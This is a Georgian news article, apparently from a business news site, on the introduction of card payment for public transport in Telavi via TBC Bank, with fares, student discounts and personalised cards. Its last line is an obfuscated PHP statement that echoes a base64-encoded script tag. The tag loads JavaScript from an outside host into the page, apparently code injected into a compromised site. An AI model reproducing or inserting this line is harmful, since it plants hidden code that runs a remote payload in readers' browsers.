celsiusi
ავერსი შნაიდერი
თელავის საზოგადოებრივ ტრანსპორტში მგზავრობის საფასურის გადახდა ბარათით არის შესაძლებელი. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს „თიბისი“ ბანკიდან აცნობეს.
მათივე ცნობით, მგზავრები გადახდას შეძლებენ, როგორც ქალაქის სატრანსპორტო ბარათით, ასევე „თიბისის“ ნებისმიერი საკრედიტო/სადებეტო ბარათით. ქალაქის სატრანსპორტო ბარათის შეძენა შესაძლებელია თელავის „თიბისის“ ფილიალებში.
„სატრანსპორტო ბარათის ღირებულება შეადგენს 2 ლარს და მისი შევსება შესაძლებელია მხოლოდ ბარათის წამკითხველი „თიბისი ფეის“ სწრაფი გადახდის აპარატის მეშვეობით.
მგზავრობის საფასური თელავში 1 ლარი იქნება. შეღავათები გავრცელდება თელავის საჯარო სკოლის მოსწავლეებზე და თელავის საგანმანათლებლო დაწესებულების სტუდენტებზე: მგზავრობის ღირებულება იქნება 50 თეთრი. იმისათვის რომ მოსწავლემ/სტუდენტმა შეძლოს შეღავათიანი ტარიფით მგზავრობა საჭიროა იქონიოს „თიბისი“ ბანკის სტუდენტის ან მოსწავლის ბარათი. შეღავათის გავრცელება მოხდება ბარათის გაცემიდან მაქსიმუმ 2-3 სამუშაო დღეში.
ცვლილება ტრანსპორტში საფასურის ბარათით გადახდაზე თელავში 16 იანვრიდან ამოქმედდა.
მერიის მიერ დადგენილ გარკვეულ სოციალურ ჯგუფებში შემავალი პირებისთვის გაიცემა პერსონიფიცირებული სატრანსპორტო ბარათები, რომელზეც ვრცელდება შეღავათიანი ტარიფები (განახევრებული ტარიფი). ასეთი ტიპის სატრანსპორტო ბარათებზე დატანილია ბარათის მფლობელის სახელი, გვარი და ფოტოსურათი. ამ ეტაპზე პერსონიფიცირებული ბარათების გაცემა ხდება თელავის მუნიციპალიტეტის მიერ. იმგზავრე ბარათით საზოგადოებრივ ტრანსპორტში. იმგზავრე ბარათით საზოგადოებრივ ტრანსპორტში. დეტალური ინფორმაციისთვის გადადით ბმულზე - https://link.tbc.ge/3GKKH8Y „,- აღნიშნულია ინფორმაციაში.
ავტორი
მირანდა შურღაია
549
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");